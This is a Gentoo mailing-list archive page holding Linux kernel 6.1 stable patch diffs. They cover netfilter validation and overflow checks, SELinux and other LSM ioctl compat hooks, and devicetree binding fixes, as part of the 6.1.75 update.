+ 	dev_add_pack(&llc_packet_type);
+-	dev_add_pack(&llc_tr_packet_type);
+ 	return 0;
+ }
+ 
+ static void __exit llc_exit(void)
+ {
+ 	dev_remove_pack(&llc_packet_type);
+-	dev_remove_pack(&llc_tr_packet_type);
+ }
+ 
+ module_init(llc_init);
+diff --git a/net/mac80211/sta_info.c b/net/mac80211/sta_info.c
+index 49b71453dec37..f3d6c3e4c970e 100644
+--- a/net/mac80211/sta_info.c
++++ b/net/mac80211/sta_info.c
+@@ -396,7 +396,10 @@ void sta_info_free(struct ieee80211_local *local, struct sta_info *sta)
+ 	int i;
+ 
+ 	for (i = 0; i < ARRAY_SIZE(sta->link); i++) {
+-		if (!(sta->sta.valid_links & BIT(i)))
++		struct link_sta_info *link_sta;
++
++		link_sta = rcu_access_pointer(sta->link[i]);
++		if (!link_sta)
+ 			continue;
+ 
+ 		sta_remove_link(sta, i, false);
+diff --git a/net/netfilter/nf_tables_api.c b/net/netfilter/nf_tables_api.c
+index 2702294ac46c6..1edb2138260a8 100644
+--- a/net/netfilter/nf_tables_api.c
++++ b/net/netfilter/nf_tables_api.c
+@@ -24,6 +24,7 @@
+ #include <net/sock.h>
+ 
+ #define NFT_MODULE_AUTOLOAD_LIMIT (MODULE_NAME_LEN - sizeof("nft-expr-255-"))
++#define NFT_SET_MAX_ANONLEN 16
+ 
+ unsigned int nf_tables_net_id __read_mostly;
+ 
+@@ -4127,6 +4128,9 @@ static int nf_tables_set_alloc_name(struct nft_ctx *ctx, struct nft_set *set,
+ 		if (p[1] != 'd' || strchr(p + 2, '%'))
+ 			return -EINVAL;
+ 
++		if (strnlen(name, NFT_SET_MAX_ANONLEN) >= NFT_SET_MAX_ANONLEN)
++			return -EINVAL;
++
+ 		inuse = (unsigned long *)get_zeroed_page(GFP_KERNEL);
+ 		if (inuse == NULL)
+ 			return -ENOMEM;
+@@ -10444,16 +10448,10 @@ static int nft_verdict_init(const struct nft_ctx *ctx, struct nft_data *data,
+ 	data->verdict.code = ntohl(nla_get_be32(tb[NFTA_VERDICT_CODE]));
+ 
+ 	switch (data->verdict.code) {
+-	default:
+-		switch (data->verdict.code & NF_VERDICT_MASK) {
+-		case NF_ACCEPT:
+-		case NF_DROP:
+-		case NF_QUEUE:
+-			break;
+-		default:
+-			return -EINVAL;
+-		}
+-		fallthrough;
++	case NF_ACCEPT:
++	case NF_DROP:
++	case NF_QUEUE:
++		break;
+ 	case NFT_CONTINUE:
+ 	case NFT_BREAK:
+ 	case NFT_RETURN:
+@@ -10488,6 +10486,8 @@ static int nft_verdict_init(const struct nft_ctx *ctx, struct nft_data *data,
+ 
+ 		data->verdict.chain = chain;
+ 		break;
++	default:
++		return -EINVAL;
+ 	}
+ 
+ 	desc->len = sizeof(data->verdict);
+diff --git a/net/netfilter/nft_chain_filter.c b/net/netfilter/nft_chain_filter.c
+index 680fe557686e4..274b6f7e6bb57 100644
+--- a/net/netfilter/nft_chain_filter.c
++++ b/net/netfilter/nft_chain_filter.c
+@@ -357,9 +357,10 @@ static int nf_tables_netdev_event(struct notifier_block *this,
+ 				  unsigned long event, void *ptr)
+ {
+ 	struct net_device *dev = netdev_notifier_info_to_dev(ptr);
++	struct nft_base_chain *basechain;
+ 	struct nftables_pernet *nft_net;
+-	struct nft_table *table;
+ 	struct nft_chain *chain, *nr;
++	struct nft_table *table;
+ 	struct nft_ctx ctx = {
+ 		.net	= dev_net(dev),
+ 	};
+@@ -371,7 +372,8 @@ static int nf_tables_netdev_event(struct notifier_block *this,
+ 	nft_net = nft_pernet(ctx.net);
+ 	mutex_lock(&nft_net->commit_mutex);
+ 	list_for_each_entry(table, &nft_net->tables, list) {
+-		if (table->family != NFPROTO_NETDEV)
++		if (table->family != NFPROTO_NETDEV &&
++		    table->family != NFPROTO_INET)
+ 			continue;
+ 
+ 		ctx.family = table->family;
+@@ -380,6 +382,11 @@ static int nf_tables_netdev_event(struct notifier_block *this,
+ 			if (!nft_is_base_chain(chain))
+ 				continue;
+ 
++			basechain = nft_base_chain(chain);
++			if (table->family == NFPROTO_INET &&
++			    basechain->ops.hooknum != NF_INET_INGRESS)
++				continue;
++
+ 			ctx.chain = chain;
+ 			nft_netdev_event(event, dev, &ctx);
+ 		}
+diff --git a/net/netfilter/nft_compat.c b/net/netfilter/nft_compat.c
+index c16172427622e..6952da7dfc02c 100644
+--- a/net/netfilter/nft_compat.c
++++ b/net/netfilter/nft_compat.c
+@@ -349,6 +349,12 @@ static int nft_target_validate(const struct nft_ctx *ctx,
+ 	unsigned int hook_mask = 0;
+ 	int ret;
+ 
++	if (ctx->family != NFPROTO_IPV4 &&
++	    ctx->family != NFPROTO_IPV6 &&
++	    ctx->family != NFPROTO_BRIDGE &&
++	    ctx->family != NFPROTO_ARP)
++		return -EOPNOTSUPP;
++
+ 	if (nft_is_base_chain(ctx->chain)) {
+ 		const struct nft_base_chain *basechain =
+ 						nft_base_chain(ctx->chain);
+@@ -592,6 +598,12 @@ static int nft_match_validate(const struct nft_ctx *ctx,
+ 	unsigned int hook_mask = 0;
+ 	int ret;
+ 
++	if (ctx->family != NFPROTO_IPV4 &&
++	    ctx->family != NFPROTO_IPV6 &&
++	    ctx->family != NFPROTO_BRIDGE &&
++	    ctx->family != NFPROTO_ARP)
++		return -EOPNOTSUPP;
++
+ 	if (nft_is_base_chain(ctx->chain)) {
+ 		const struct nft_base_chain *basechain =
+ 						nft_base_chain(ctx->chain);
+diff --git a/net/netfilter/nft_flow_offload.c b/net/netfilter/nft_flow_offload.c
+index 8a43f6f9c90b6..3d9f6dda5aeb2 100644
+--- a/net/netfilter/nft_flow_offload.c
++++ b/net/netfilter/nft_flow_offload.c
+@@ -380,6 +380,11 @@ static int nft_flow_offload_validate(const struct nft_ctx *ctx,
+ {
+ 	unsigned int hook_mask = (1 << NF_INET_FORWARD);
+ 
++	if (ctx->family != NFPROTO_IPV4 &&
++	    ctx->family != NFPROTO_IPV6 &&
++	    ctx->family != NFPROTO_INET)
++		return -EOPNOTSUPP;
++
+ 	return nft_chain_validate_hooks(ctx->chain, hook_mask);
+ }
+ 
+diff --git a/net/netfilter/nft_limit.c b/net/netfilter/nft_limit.c
+index 75c05ef885a91..36ded7d43262c 100644
+--- a/net/netfilter/nft_limit.c
++++ b/net/netfilter/nft_limit.c
+@@ -58,17 +58,19 @@ static inline bool nft_limit_eval(struct nft_limit_priv *priv, u64 cost)
+ static int nft_limit_init(struct nft_limit_priv *priv,
+ 			  const struct nlattr * const tb[], bool pkts)
+ {
++	u64 unit, tokens, rate_with_burst;
+ 	bool invert = false;
+-	u64 unit, tokens;
+ 
+ 	if (tb[NFTA_LIMIT_RATE] == NULL ||
+ 	    tb[NFTA_LIMIT_UNIT] == NULL)
+ 		return -EINVAL;
+ 
+ 	priv->rate = be64_to_cpu(nla_get_be64(tb[NFTA_LIMIT_RATE]));
++	if (priv->rate == 0)
++		return -EINVAL;
++
+ 	unit = be64_to_cpu(nla_get_be64(tb[NFTA_LIMIT_UNIT]));
+-	priv->nsecs = unit * NSEC_PER_SEC;
+-	if (priv->rate == 0 || priv->nsecs < unit)
++	if (check_mul_overflow(unit, NSEC_PER_SEC, &priv->nsecs))
+ 		return -EOVERFLOW;
+ 
+ 	if (tb[NFTA_LIMIT_BURST])
+@@ -77,18 +79,25 @@ static int nft_limit_init(struct nft_limit_priv *priv,
+ 	if (pkts && priv->burst == 0)
+ 		priv->burst = NFT_LIMIT_PKT_BURST_DEFAULT;
+ 
+-	if (priv->rate + priv->burst < priv->rate)
++	if (check_add_overflow(priv->rate, priv->burst, &rate_with_burst))
+ 		return -EOVERFLOW;
+ 
+ 	if (pkts) {
+-		tokens = div64_u64(priv->nsecs, priv->rate) * priv->burst;
++		u64 tmp = div64_u64(priv->nsecs, priv->rate);
++
++		if (check_mul_overflow(tmp, priv->burst, &tokens))
++			return -EOVERFLOW;
+ 	} else {
++		u64 tmp;
++
+ 		/* The token bucket size limits the number of tokens can be
+ 		 * accumulated. tokens_max specifies the bucket size.
+ 		 * tokens_max = unit * (rate + burst) / rate.
+ 		 */
+-		tokens = div64_u64(priv->nsecs * (priv->rate + priv->burst),
+-				 priv->rate);
++		if (check_mul_overflow(priv->nsecs, rate_with_burst, &tmp))
++			return -EOVERFLOW;
++
++		tokens = div64_u64(tmp, priv->rate);
+ 	}
+ 
+ 	if (tb[NFTA_LIMIT_FLAGS]) {
+diff --git a/net/netfilter/nft_nat.c b/net/netfilter/nft_nat.c
+index 353c090f88917..ba7bcce724efd 100644
+--- a/net/netfilter/nft_nat.c
++++ b/net/netfilter/nft_nat.c
+@@ -142,6 +142,11 @@ static int nft_nat_validate(const struct nft_ctx *ctx,
+ 	struct nft_nat *priv = nft_expr_priv(expr);
+ 	int err;
+ 
++	if (ctx->family != NFPROTO_IPV4 &&
++	    ctx->family != NFPROTO_IPV6 &&
++	    ctx->family != NFPROTO_INET)
++		return -EOPNOTSUPP;
++
+ 	err = nft_chain_validate_dependency(ctx->chain, NFT_CHAIN_T_NAT);
+ 	if (err < 0)
+ 		return err;
+diff --git a/net/netfilter/nft_rt.c b/net/netfilter/nft_rt.c
+index 71931ec917219..7d21e16499bfa 100644
+--- a/net/netfilter/nft_rt.c
++++ b/net/netfilter/nft_rt.c
+@@ -166,6 +166,11 @@ static int nft_rt_validate(const struct nft_ctx *ctx, const struct nft_expr *exp
+ 	const struct nft_rt *priv = nft_expr_priv(expr);
+ 	unsigned int hooks;
+ 
++	if (ctx->family != NFPROTO_IPV4 &&
++	    ctx->family != NFPROTO_IPV6 &&
++	    ctx->family != NFPROTO_INET)
++		return -EOPNOTSUPP;
++
+ 	switch (priv->key) {
+ 	case NFT_RT_NEXTHOP4:
+ 	case NFT_RT_NEXTHOP6:
+diff --git a/net/netfilter/nft_socket.c b/net/netfilter/nft_socket.c
+index 777561b71fcbd..f28324fd8d718 100644
+--- a/net/netfilter/nft_socket.c
++++ b/net/netfilter/nft_socket.c
+@@ -242,6 +242,11 @@ static int nft_socket_validate(const struct nft_ctx *ctx,
+ 			       const struct nft_expr *expr,
+ 			       const struct nft_data **data)
+ {
++	if (ctx->family != NFPROTO_IPV4 &&
++	    ctx->family != NFPROTO_IPV6 &&
++	    ctx->family != NFPROTO_INET)
++		return -EOPNOTSUPP;
++
+ 	return nft_chain_validate_hooks(ctx->chain,
+ 					(1 << NF_INET_PRE_ROUTING) |
+ 					(1 << NF_INET_LOCAL_IN) |
+diff --git a/net/netfilter/nft_synproxy.c b/net/netfilter/nft_synproxy.c
+index 6cf9a04fbfe23..a450f28a5ef60 100644
+--- a/net/netfilter/nft_synproxy.c
++++ b/net/netfilter/nft_synproxy.c
+@@ -186,7 +186,6 @@ static int nft_synproxy_do_init(const struct nft_ctx *ctx,
+ 		break;
+ #endif
+ 	case NFPROTO_INET:
+-	case NFPROTO_BRIDGE:
+ 		err = nf_synproxy_ipv4_init(snet, ctx->net);
+ 		if (err)
+ 			goto nf_ct_failure;
+@@ -219,7 +218,6 @@ static void nft_synproxy_do_destroy(const struct nft_ctx *ctx)
+ 		break;
+ #endif
+ 	case NFPROTO_INET:
+-	case NFPROTO_BRIDGE:
+ 		nf_synproxy_ipv4_fini(snet, ctx->net);
+ 		nf_synproxy_ipv6_fini(snet, ctx->net);
+ 		break;
+@@ -253,6 +251,11 @@ static int nft_synproxy_validate(const struct nft_ctx *ctx,
+ 				 const struct nft_expr *expr,
+ 				 const struct nft_data **data)
+ {
++	if (ctx->family != NFPROTO_IPV4 &&
++	    ctx->family != NFPROTO_IPV6 &&
++	    ctx->family != NFPROTO_INET)
++		return -EOPNOTSUPP;
++
+ 	return nft_chain_validate_hooks(ctx->chain, (1 << NF_INET_LOCAL_IN) |
+ 						    (1 << NF_INET_FORWARD));
+ }
+diff --git a/net/netfilter/nft_tproxy.c b/net/netfilter/nft_tproxy.c
+index 62da25ad264bc..adb50c39572e2 100644
+--- a/net/netfilter/nft_tproxy.c
++++ b/net/netfilter/nft_tproxy.c
+@@ -316,6 +316,11 @@ static int nft_tproxy_validate(const struct nft_ctx *ctx,
+ 			       const struct nft_expr *expr,
+ 			       const struct nft_data **data)
+ {
++	if (ctx->family != NFPROTO_IPV4 &&
++	    ctx->family != NFPROTO_IPV6 &&
++	    ctx->family != NFPROTO_INET)
++		return -EOPNOTSUPP;
++
+ 	return nft_chain_validate_hooks(ctx->chain, 1 << NF_INET_PRE_ROUTING);
+ }
+ 
+diff --git a/net/netfilter/nft_xfrm.c b/net/netfilter/nft_xfrm.c
+index 1c5343c936a8a..30259846c3525 100644
+--- a/net/netfilter/nft_xfrm.c
++++ b/net/netfilter/nft_xfrm.c
+@@ -235,6 +235,11 @@ static int nft_xfrm_validate(const struct nft_ctx *ctx, const struct nft_expr *e
+ 	const struct nft_xfrm *priv = nft_expr_priv(expr);
+ 	unsigned int hooks;
+ 
++	if (ctx->family != NFPROTO_IPV4 &&
++	    ctx->family != NFPROTO_IPV6 &&
++	    ctx->family != NFPROTO_INET)
++		return -EOPNOTSUPP;
++
+ 	switch (priv->dir) {
+ 	case XFRM_POLICY_IN:
+ 		hooks = (1 << NF_INET_FORWARD) |
+diff --git a/net/netlink/af_netlink.c b/net/netlink/af_netlink.c
+index cb833302270a6..6857a4965fe87 100644
+--- a/net/netlink/af_netlink.c
++++ b/net/netlink/af_netlink.c
+@@ -374,7 +374,7 @@ static void netlink_skb_destructor(struct sk_buff *skb)
+ 	if (is_vmalloc_addr(skb->head)) {
+ 		if (!skb->cloned ||
+ 		    !atomic_dec_return(&(skb_shinfo(skb)->dataref)))
+-			vfree(skb->head);
++			vfree_atomic(skb->head);
+ 
+ 		skb->head = NULL;
+ 	}
+diff --git a/net/rds/af_rds.c b/net/rds/af_rds.c
+index 3ff6995244e5e..d107f7605db4f 100644
+--- a/net/rds/af_rds.c
++++ b/net/rds/af_rds.c
+@@ -419,7 +419,7 @@ static int rds_recv_track_latency(struct rds_sock *rs, sockptr_t optval,
+ 
+ 	rs->rs_rx_traces = trace.rx_traces;
+ 	for (i = 0; i < rs->rs_rx_traces; i++) {
+-		if (trace.rx_trace_pos[i] > RDS_MSG_RX_DGRAM_TRACE_MAX) {
++		if (trace.rx_trace_pos[i] >= RDS_MSG_RX_DGRAM_TRACE_MAX) {
+ 			rs->rs_rx_traces = 0;
+ 			return -EFAULT;
+ 		}
+diff --git a/net/smc/smc_diag.c b/net/smc/smc_diag.c
+index 801044e7d1949..7a907186a33ae 100644
+--- a/net/smc/smc_diag.c
++++ b/net/smc/smc_diag.c
+@@ -163,7 +163,7 @@ static int __smc_diag_dump(struct sock *sk, struct sk_buff *skb,
+ 	}
+ 	if (smc_conn_lgr_valid(&smc->conn) && smc->conn.lgr->is_smcd &&
+ 	    (req->diag_ext & (1 << (SMC_DIAG_DMBINFO - 1))) &&
+-	    !list_empty(&smc->conn.lgr->list)) {
++	    !list_empty(&smc->conn.lgr->list) && smc->conn.rmb_desc) {
+ 		struct smc_connection *conn = &smc->conn;
+ 		struct smcd_diag_dmbinfo dinfo;
+ 
+diff --git a/scripts/get_abi.pl b/scripts/get_abi.pl
+index 0ffd5531242aa..408bfd0216da0 100755
+--- a/scripts/get_abi.pl
++++ b/scripts/get_abi.pl
+@@ -98,7 +98,7 @@ sub parse_abi {
+ 	$name =~ s,.*/,,;
+ 
+ 	my $fn = $file;
+-	$fn =~ s,Documentation/ABI/,,;
++	$fn =~ s,.*Documentation/ABI/,,;
+ 
+ 	my $nametag = "File $fn";
+ 	$data{$nametag}->{what} = "File $name";
+diff --git a/security/security.c b/security/security.c
+index 5fa286ae9908d..fc15b963e1028 100644
+--- a/security/security.c
++++ b/security/security.c
+@@ -1569,6 +1569,24 @@ int security_file_ioctl(struct file *file, unsigned int cmd, unsigned long arg)
+ }
+ EXPORT_SYMBOL_GPL(security_file_ioctl);
+ 
++/**
++ * security_file_ioctl_compat() - Check if an ioctl is allowed in compat mode
++ * @file: associated file
++ * @cmd: ioctl cmd
++ * @arg: ioctl arguments
++ *
++ * Compat version of security_file_ioctl() that correctly handles 32-bit
++ * processes running on 64-bit kernels.
++ *
++ * Return: Returns 0 if permission is granted.
++ */
++int security_file_ioctl_compat(struct file *file, unsigned int cmd,
++			       unsigned long arg)
++{
++	return call_int_hook(file_ioctl_compat, 0, file, cmd, arg);
++}
++EXPORT_SYMBOL_GPL(security_file_ioctl_compat);
++
+ static inline unsigned long mmap_prot(struct file *file, unsigned long prot)
+ {
+ 	/*
+diff --git a/security/selinux/hooks.c b/security/selinux/hooks.c
+index d45e9fa74e62d..78f3da39b0319 100644
+--- a/security/selinux/hooks.c
++++ b/security/selinux/hooks.c
+@@ -3718,6 +3718,33 @@ static int selinux_file_ioctl(struct file *file, unsigned int cmd,
+ 	return error;
+ }
+ 
++static int selinux_file_ioctl_compat(struct file *file, unsigned int cmd,
++			      unsigned long arg)
++{
++	/*
++	 * If we are in a 64-bit kernel running 32-bit userspace, we need to
++	 * make sure we don't compare 32-bit flags to 64-bit flags.
++	 */
++	switch (cmd) {
++	case FS_IOC32_GETFLAGS:
++		cmd = FS_IOC_GETFLAGS;
++		break;
++	case FS_IOC32_SETFLAGS:
++		cmd = FS_IOC_SETFLAGS;
++		break;
++	case FS_IOC32_GETVERSION:
++		cmd = FS_IOC_GETVERSION;
++		break;
++	case FS_IOC32_SETVERSION:
++		cmd = FS_IOC_SETVERSION;
++		break;
++	default:
++		break;
++	}
++
++	return selinux_file_ioctl(file, cmd, arg);
++}
++
+ static int default_noexec __ro_after_init;
+ 
+ static int file_map_prot_check(struct file *file, unsigned long prot, int shared)
+@@ -7135,6 +7162,7 @@ static struct security_hook_list selinux_hooks[] __lsm_ro_after_init = {
+ 	LSM_HOOK_INIT(file_permission, selinux_file_permission),
+ 	LSM_HOOK_INIT(file_alloc_security, selinux_file_alloc_security),
+ 	LSM_HOOK_INIT(file_ioctl, selinux_file_ioctl),
++	LSM_HOOK_INIT(file_ioctl_compat, selinux_file_ioctl_compat),
+ 	LSM_HOOK_INIT(mmap_file, selinux_mmap_file),
+ 	LSM_HOOK_INIT(mmap_addr, selinux_mmap_addr),
+ 	LSM_HOOK_INIT(file_mprotect, selinux_file_mprotect),
+diff --git a/security/smack/smack_lsm.c b/security/smack/smack_lsm.c
+index cd6a03e945eb7..fbadc61feedd1 100644
+--- a/security/smack/smack_lsm.c
++++ b/security/smack/smack_lsm.c
+@@ -4905,6 +4905,7 @@ static struct security_hook_list smack_hooks[] __lsm_ro_after_init = {
+ 
+ 	LSM_HOOK_INIT(file_alloc_security, smack_file_alloc_security),
+ 	LSM_HOOK_INIT(file_ioctl, smack_file_ioctl),
++	LSM_HOOK_INIT(file_ioctl_compat, smack_file_ioctl),
+ 	LSM_HOOK_INIT(file_lock, smack_file_lock),
+ 	LSM_HOOK_INIT(file_fcntl, smack_file_fcntl),
+ 	LSM_HOOK_INIT(mmap_file, smack_mmap_file),
+diff --git a/security/tomoyo/tomoyo.c b/security/tomoyo/tomoyo.c
+index 71e82d855ebfc..fb599401bc7d2 100644
+--- a/security/tomoyo/tomoyo.c
++++ b/security/tomoyo/tomoyo.c
+@@ -555,6 +555,7 @@ static struct security_hook_list tomoyo_hooks[] __lsm_ro_after_init = {
+ 	LSM_HOOK_INIT(path_rename, tomoyo_path_rename),
+ 	LSM_HOOK_INIT(inode_getattr, tomoyo_inode_getattr),
+ 	LSM_HOOK_INIT(file_ioctl, tomoyo_file_ioctl),
++	LSM_HOOK_INIT(file_ioctl_compat, tomoyo_file_ioctl),
+ 	LSM_HOOK_INIT(path_chmod, tomoyo_path_chmod),
+ 	LSM_HOOK_INIT(path_chown, tomoyo_path_chown),
+ 	LSM_HOOK_INIT(path_chroot, tomoyo_path_chroot),
+diff --git a/tools/testing/selftests/drivers/net/netdevsim/udp_tunnel_nic.sh b/tools/testing/selftests/drivers/net/netdevsim/udp_tunnel_nic.sh
+index 1b08e042cf942..185b02d2d4cd1 100755
+--- a/tools/testing/selftests/drivers/net/netdevsim/udp_tunnel_nic.sh
++++ b/tools/testing/selftests/drivers/net/netdevsim/udp_tunnel_nic.sh
+@@ -269,6 +269,7 @@ for port in 0 1; do
+ 	echo 1 > $NSIM_DEV_SYS/new_port
+     fi
+     NSIM_NETDEV=`get_netdev_name old_netdevs`
++    ifconfig $NSIM_NETDEV up
+ 
+     msg="new NIC device created"
+     exp0=( 0 0 0 0 )
+@@ -430,6 +431,7 @@ for port in 0 1; do
+     fi
+ 
+     echo $port > $NSIM_DEV_SYS/new_port
++    NSIM_NETDEV=`get_netdev_name old_netdevs`
+     ifconfig $NSIM_NETDEV up
+ 
+     overflow_table0 "overflow NIC table"
+@@ -487,6 +489,7 @@ for port in 0 1; do
+     fi
+ 
+     echo $port > $NSIM_DEV_SYS/new_port
++    NSIM_NETDEV=`get_netdev_name old_netdevs`
+     ifconfig $NSIM_NETDEV up
+ 
+     overflow_table0 "overflow NIC table"
+@@ -543,6 +546,7 @@ for port in 0 1; do
+     fi
+ 
+     echo $port > $NSIM_DEV_SYS/new_port
++    NSIM_NETDEV=`get_netdev_name old_netdevs`
+     ifconfig $NSIM_NETDEV up
+ 
+     overflow_table0 "destroy NIC"
+@@ -572,6 +576,7 @@ for port in 0 1; do
+     fi
+ 
+     echo $port > $NSIM_DEV_SYS/new_port
++    NSIM_NETDEV=`get_netdev_name old_netdevs`
+     ifconfig $NSIM_NETDEV up
+ 
+     msg="create VxLANs v6"
+@@ -632,6 +637,7 @@ for port in 0 1; do
+     fi
+ 
+     echo $port > $NSIM_DEV_SYS/new_port
++    NSIM_NETDEV=`get_netdev_name old_netdevs`
+     ifconfig $NSIM_NETDEV up
+ 
+     echo 110 > $NSIM_DEV_DFS/ports/$port/udp_ports_inject_error
+@@ -687,6 +693,7 @@ for port in 0 1; do
+     fi
+ 
+     echo $port > $NSIM_DEV_SYS/new_port
++    NSIM_NETDEV=`get_netdev_name old_netdevs`
+     ifconfig $NSIM_NETDEV up
+ 
+     msg="create VxLANs v6"
+@@ -746,6 +753,7 @@ for port in 0 1; do
+     fi
+ 
+     echo $port > $NSIM_DEV_SYS/new_port
++    NSIM_NETDEV=`get_netdev_name old_netdevs`
+     ifconfig $NSIM_NETDEV up
+ 
+     msg="create VxLANs v6"
+@@ -876,6 +884,7 @@ msg="re-add a port"
+ 
+ echo 2 > $NSIM_DEV_SYS/del_port
+ echo 2 > $NSIM_DEV_SYS/new_port
++NSIM_NETDEV=`get_netdev_name old_netdevs`
+ check_tables
+ 
+ msg="replace VxLAN in overflow table"


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-01-26  0:09 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-01-26  0:09 UTC (permalink / raw
  To: gentoo-commits

commit:     4ff558e4765fc0dcce52c13d5bfca05ae404063e
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Jan 26 00:09:15 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Jan 26 00:09:15 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=4ff558e4

Linux patch 6.1.75

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |     4 +
 1074_linux-6.1.75.patch | 15017 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 15021 insertions(+)

diff --git a/0000_README b/0000_README
index 32442528..8ba5f5b4 100644
--- a/0000_README
+++ b/0000_README
@@ -339,6 +339,10 @@ Patch:  1073_linux-6.1.74.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.74
 
+Patch:  1074_linux-6.1.75.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.75
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1074_linux-6.1.75.patch b/1074_linux-6.1.75.patch
new file mode 100644
index 00000000..467e3c0a
--- /dev/null
+++ b/1074_linux-6.1.75.patch
@@ -0,0 +1,15017 @@
+diff --git a/Documentation/devicetree/bindings/gpio/xlnx,gpio-xilinx.yaml b/Documentation/devicetree/bindings/gpio/xlnx,gpio-xilinx.yaml
+index f333ee2288e76..11ae8ec3c7394 100644
+--- a/Documentation/devicetree/bindings/gpio/xlnx,gpio-xilinx.yaml
++++ b/Documentation/devicetree/bindings/gpio/xlnx,gpio-xilinx.yaml
+@@ -126,7 +126,7 @@ examples:
+   - |
+     #include <dt-bindings/interrupt-controller/arm-gic.h>
+ 
+-        gpio@e000a000 {
++        gpio@a0020000 {
+             compatible = "xlnx,xps-gpio-1.00.a";
+             reg = <0xa0020000 0x10000>;
+             #gpio-cells = <2>;
+diff --git a/Documentation/devicetree/bindings/media/mediatek,mdp3-rdma.yaml b/Documentation/devicetree/bindings/media/mediatek,mdp3-rdma.yaml
+index 9cfc0c7d23e06..46730687c6624 100644
+--- a/Documentation/devicetree/bindings/media/mediatek,mdp3-rdma.yaml
++++ b/Documentation/devicetree/bindings/media/mediatek,mdp3-rdma.yaml
+@@ -61,6 +61,9 @@ properties:
+       - description: used for 1st data pipe from RDMA
+       - description: used for 2nd data pipe from RDMA
+ 
++  '#dma-cells':
++    const: 1
++
+ required:
+   - compatible
+   - reg
+@@ -70,6 +73,7 @@ required:
+   - clocks
+   - iommus
+   - mboxes
++  - '#dma-cells'
+ 
+ additionalProperties: false
+ 
+@@ -80,16 +84,17 @@ examples:
+     #include <dt-bindings/power/mt8183-power.h>
+     #include <dt-bindings/memory/mt8183-larb-port.h>
+ 
+-    mdp3_rdma0: mdp3-rdma0@14001000 {
+-      compatible = "mediatek,mt8183-mdp3-rdma";
+-      reg = <0x14001000 0x1000>;
+-      mediatek,gce-client-reg = <&gce SUBSYS_1400XXXX 0x1000 0x1000>;
+-      mediatek,gce-events = <CMDQ_EVENT_MDP_RDMA0_SOF>,
+-                            <CMDQ_EVENT_MDP_RDMA0_EOF>;
+-      power-domains = <&spm MT8183_POWER_DOMAIN_DISP>;
+-      clocks = <&mmsys CLK_MM_MDP_RDMA0>,
+-               <&mmsys CLK_MM_MDP_RSZ1>;
+-      iommus = <&iommu>;
+-      mboxes = <&gce 20 CMDQ_THR_PRIO_LOWEST>,
+-               <&gce 21 CMDQ_THR_PRIO_LOWEST>;
++    dma-controller@14001000 {
++        compatible = "mediatek,mt8183-mdp3-rdma";
++        reg = <0x14001000 0x1000>;
++        mediatek,gce-client-reg = <&gce SUBSYS_1400XXXX 0x1000 0x1000>;
++        mediatek,gce-events = <CMDQ_EVENT_MDP_RDMA0_SOF>,
++                              <CMDQ_EVENT_MDP_RDMA0_EOF>;
++        power-domains = <&spm MT8183_POWER_DOMAIN_DISP>;
++        clocks = <&mmsys CLK_MM_MDP_RDMA0>,
++                 <&mmsys CLK_MM_MDP_RSZ1>;
++        iommus = <&iommu>;
++        mboxes = <&gce 20 CMDQ_THR_PRIO_LOWEST>,
++                 <&gce 21 CMDQ_THR_PRIO_LOWEST>;
++        #dma-cells = <1>;
+     };
+diff --git a/Documentation/devicetree/bindings/media/mediatek,mdp3-wrot.yaml b/Documentation/devicetree/bindings/media/mediatek,mdp3-wrot.yaml
+index 0baa77198fa21..64ea98aa05928 100644
+--- a/Documentation/devicetree/bindings/media/mediatek,mdp3-wrot.yaml
++++ b/Documentation/devicetree/bindings/media/mediatek,mdp3-wrot.yaml
+@@ -50,6 +50,9 @@ properties:
+   iommus:
+     maxItems: 1
+ 
++  '#dma-cells':
++    const: 1
++
+ required:
+   - compatible
+   - reg
+@@ -58,6 +61,7 @@ required:
+   - power-domains
+   - clocks
+   - iommus
++  - '#dma-cells'
+ 
+ additionalProperties: false
+ 
+@@ -68,13 +72,14 @@ examples:
+     #include <dt-bindings/power/mt8183-power.h>
+     #include <dt-bindings/memory/mt8183-larb-port.h>
+ 
+-    mdp3_wrot0: mdp3-wrot0@14005000 {
+-      compatible = "mediatek,mt8183-mdp3-wrot";
+-      reg = <0x14005000 0x1000>;
+-      mediatek,gce-client-reg = <&gce SUBSYS_1400XXXX 0x5000 0x1000>;
+-      mediatek,gce-events = <CMDQ_EVENT_MDP_WROT0_SOF>,
+-                            <CMDQ_EVENT_MDP_WROT0_EOF>;
+-      power-domains = <&spm MT8183_POWER_DOMAIN_DISP>;
+-      clocks = <&mmsys CLK_MM_MDP_WROT0>;
+-      iommus = <&iommu>;
++    dma-controller@14005000 {
++        compatible = "mediatek,mt8183-mdp3-wrot";
++        reg = <0x14005000 0x1000>;
++        mediatek,gce-client-reg = <&gce SUBSYS_1400XXXX 0x5000 0x1000>;
++        mediatek,gce-events = <CMDQ_EVENT_MDP_WROT0_SOF>,
++                              <CMDQ_EVENT_MDP_WROT0_EOF>;
++        power-domains = <&spm MT8183_POWER_DOMAIN_DISP>;
++        clocks = <&mmsys CLK_MM_MDP_WROT0>;
++        iommus = <&iommu>;
++        #dma-cells = <1>;
+     };
+diff --git a/Documentation/devicetree/bindings/media/rockchip-isp1.yaml b/Documentation/devicetree/bindings/media/rockchip-isp1.yaml
+index b3661d7d43572..2a0ad332f5ced 100644
+--- a/Documentation/devicetree/bindings/media/rockchip-isp1.yaml
++++ b/Documentation/devicetree/bindings/media/rockchip-isp1.yaml
+@@ -90,15 +90,16 @@ properties:
+         description: connection point for input on the parallel interface
+ 
+         properties:
+-          bus-type:
+-            enum: [5, 6]
+-
+           endpoint:
+             $ref: video-interfaces.yaml#
+             unevaluatedProperties: false
+ 
+-        required:
+-          - bus-type
++            properties:
++              bus-type:
++                enum: [5, 6]
++
++            required:
++              - bus-type
+ 
+     anyOf:
+       - required:
